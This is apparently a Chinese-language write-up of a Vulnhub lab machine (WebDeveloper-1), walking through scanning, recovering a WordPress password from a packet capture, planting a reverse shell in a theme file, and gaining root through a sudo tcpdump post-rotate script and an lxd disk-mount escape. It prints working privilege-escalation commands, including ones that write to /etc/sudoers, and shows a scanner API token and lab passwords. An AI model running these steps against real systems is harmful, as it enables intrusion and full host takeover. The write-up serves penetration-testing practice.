Vulnhub-29.WebDeveloper-1

WebDeveloper-1

信息收集

arp-scan -l          nmap --min-rate 100000 -p- 192.168.240.136     nmap --min-rate 100000 -p80,22 -A 192.168.240.136
nikto -host 192.168.240.136 -p 80
wpscan --url http://192.168.240.136/ -eu --api-token rhXTa9t3zrV0zXuzHKI6pV7H37cfl41OQqYNgQyWH5k
dirb  http://192.168.240.136/

$ nmap --min-rate 100000 -p80,22 -A 192.168.240.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-08 19:37 CST
Nmap scan report for 192.168.240.136
Host is up (0.00036s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d2:ac:73:4c:17:ec:6a:82:79:87:5a:f9:22:d4:12:cb (RSA)
|   256 9c:d5:f3:2c:e2:d0:06:cc:8c:15:5a:5a:81:5b:03:3d (ECDSA)
|_  256 ab:67:56:69:27:ea:3e:3b:33:73:32:f8:ff:2e:1f:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Database Error
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:99:3D:7A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.36 ms 192.168.240.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.28 seconds

nikto -host 192.168.240.136 -p 80

$ nikto -host 192.168.240.136 -p 80
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.240.136
+ Target Hostname:    192.168.240.136
+ Target Port:        80
+ Start Time:         2024-12-08 19:38:15 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /xmlrpc.php: xmlrpc.php was found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /license.txt: License file found may identify site software.
+ /wp-admin/: Admin login page/section found.
+ /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information.
+ 8102 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2024-12-08 19:38:27 (GMT8) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# root @ penetration in /mnt/c/Users/Anonymous/Desktop [19:45:55] C:4
$ wpscan --url http://192.168.240.136/ -eu --api-token rhXTa9t3zrV0zXuzHKI6pV7H37cfl41OQqYNgQyWH5k
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.240.136/ [192.168.240.136]
[+] Started: Sun Dec  8 19:48:06 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.240.136/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.240.136/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.240.136/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.240.136/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.240.136/index.php/feed/, <generator>https://wordpress.org/?v=4.9.8</generator>
 |  - http://192.168.240.136/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.9.8</generator>
 |
 |
[+] WordPress theme in use: twentyseventeen
 | Location: http://192.168.240.136/wp-content/themes/twentyseventeen/
 | Last Updated: 2024-11-12T00:00:00.000Z
 | Readme: http://192.168.240.136/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.8
 | Style URL: http://192.168.240.136/wp-content/themes/twentyseventeen/style.css?ver=4.9.8
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.240.136/wp-content/themes/twentyseventeen/style.css?ver=4.9.8, Match: 'Version: 1.7'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] webdeveloper
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.240.136/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 23

[+] Finished: Sun Dec  8 19:48:09 2024
[+] Requests Done: 57
[+] Cached Requests: 9
[+] Data Sent: 13.949 KB
[+] Data Received: 338.115 KB
[+] Memory used: 180.637 MB
[+] Elapsed time: 00:00:03

# root @ penetration in /mnt/c/Users/Anonymous/Desktop [19:48:09] C:5
$ dirb  http://192.168.240.136/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Dec  8 19:53:54 2024
URL_BASE: http://192.168.240.136/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.240.136/ ----
+ http://192.168.240.136/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.240.136/ipdata/
+ http://192.168.240.136/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.240.136/wp-admin/
==> DIRECTORY: http://192.168.240.136/wp-content/
==> DIRECTORY: http://192.168.240.136/wp-includes/
+ http://192.168.240.136/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.240.136/ipdata/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.240.136/wp-admin/ ----
+ http://192.168.240.136/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.240.136/wp-admin/css/
==> DIRECTORY: http://192.168.240.136/wp-admin/images/
==> DIRECTORY: http://192.168.240.136/wp-admin/includes/
+ http://192.168.240.136/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.240.136/wp-admin/js/
==> DIRECTORY: http://192.168.240.136/wp-admin/maint/
==> DIRECTORY: http://192.168.240.136/wp-admin/network/
==> DIRECTORY: http://192.168.240.136/wp-admin/user/

---- Entering directory: http://192.168.240.136/wp-content/ ----
+ http://192.168.240.136/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.240.136/wp-content/plugins/
==> DIRECTORY: http://192.168.240.136/wp-content/themes/
==> DIRECTORY: http://192.168.240.136/wp-content/uploads/

---- Entering directory: http://192.168.240.136/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.240.136/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.240.136/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.240.136/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.240.136/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.240.136/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.240.136/wp-admin/network/ ----
+ http://192.168.240.136/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.240.136/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.240.136/wp-admin/user/ ----
+ http://192.168.240.136/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.240.136/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.240.136/wp-content/plugins/ ----
+ http://192.168.240.136/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.240.136/wp-content/themes/ ----
+ http://192.168.240.136/wp-content/themes/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.240.136/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Dec  8 19:54:14 2024
DOWNLOADED: 32284 - FOUND: 12

渗透测试

80端口：又是一个wordpress站
http://192.168.240.136/ipdata/  这里下载了一个流量包
http://192.168.240.136/xmlrpc.php  这里说是只支持post协议,
在wireshark过滤一下post包http.request.method == "POST",追踪tcp流发现密码
log=webdeveloper&pwd=Te5eQg&4sBS!Yr$)wf%(DcAd&wp-submit=Log+In&redirect_to=http://192.168.1.176/wordpress/wp-admin/&testcookie=1

直接后台登录http://192.168.240.136/wp-admin/user/admin.php
找到404.php，在里面写反弹shell，访问http://192.168.240.136/wp-content/themes/twentysixteen/404.php或者直接http://192.168.240.136/404.php
连接上shell,获得交互式shell python -c 'import pty;pty.spawn("/bin/bash")'
交互式shell：bash -i

提权

先看config  cat /var/www/html/wp-config.php,找到本地用户密码 webdeveloper   MasterOfTheUniverse

sudo -l   usr/sbin/tcp/dump

linux 普通用户默认是没有权限使用tcpdump的，

所以需要root 用户赋权：

root#  setcap cap_net_raw=eip  /usr/sbin/tcpdump


不要为普通用户添加tcpdump的sudo权限，

zhangsan ALL=(root) NOPASSWD:  /usr/bin/awk, /usr/bin/less /tmp/abc.text, /usr/sbin/tcpdump
很容易通过tcpdump 提权root

sudo tcpdum -i any -w /dev/null -G 1 -z /tmp/test.sh -Z root

在执行test.sh 时候是以root权限执行的， 所以在这个脚本中完全可以修改/etc/sudoers 文件，将zhangsan 提权

tcpdump
  TCP标记值：tcp-fin, tcp-syn, tcp-rst, tcp-push, tcp-push, tcp-ack, tcp-urg
  tcpdump -i any tcp dst port 6379  and 'tcp[tcpflags] & tcp-push != 0' -w 1234.cap
  tcpdump -i any dst host 10.100.125.22 and tcp dst port 8082  and 'tcp[tcpflags] & tcp-push != 0'
————————————————

                            版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。
                        
原文链接：https://blog.csdn.net/lyyslsw1230_163com/article/details/103765216

弹不了,再找找.失败只是暂时的.
提权命令查询,各种:
https://gtfobins.github.io/

查看是否存在find命令setuid执行权限：
find / -perm -4000 2>/dev/null | grep find
现在没有任何setuid权限
echo "chmod u+s /usr/bin/find"> shell.sh
chmod +x shell.sh
sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root

创建完成确认find命令是否成功被赋予setuid权限：
find / -perm -4000 2>/dev/null | grep find
执行find命令开始提权
find /tmp -exec sh -i \;   ---发现没有获得root权限
find . -exec /bin/sh -p\;  --- -p执行即可

webdeveloper@webdeveloper:/tmp$ echo 'echo "%webdeveloper ALL=(ALL:ALL) ALL" >> /etc/sudoers' > test.sh
webdeveloper@webdeveloper:/tmp$ chmod +x test.sh
webdeveloper@webdeveloper:/tmp$ sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/test.sh -Z root
dropped privs to root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
1 packet captured
14 packets received by filter
0 packets dropped by kernel
webdeveloper@webdeveloper:/tmp$ sudo -l
Matching Defaults entries for webdeveloper on webdeveloper:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webdeveloper may run the following commands on webdeveloper:
    (root) /usr/sbin/tcpdump
    (ALL : ALL) ALL
webdeveloper@webdeveloper:/tmp$ sudo su
root@webdeveloper:/tmp#

学习一种新的提权方法-挂载提权

滥用该lxd组来重新挂载文件系统并更改root拥有的文件 https://reboare.github.io/lxd/lxd-escape.html
创建
lxd init   ----   一直回车

创建了一个lxc容器：
lxc init ubuntu:16.04 test -c security.privileged=true

分配了安全权限，并将整个磁盘挂载到/mnt/root：
lxc config device add test whatever disk source=/ path=/mnt/root recursive=true
这时候会下载几分钟！
lxc start test
lxc exec test bash
这时候挂载的test 乌班图容器就挂载好了，执行命令：
执行的还是所有权命令：

echo "%webdeveloper ALL=(ALL:ALL) ALL" >> /mnt/root/etc/sudoers
exit 
sudo su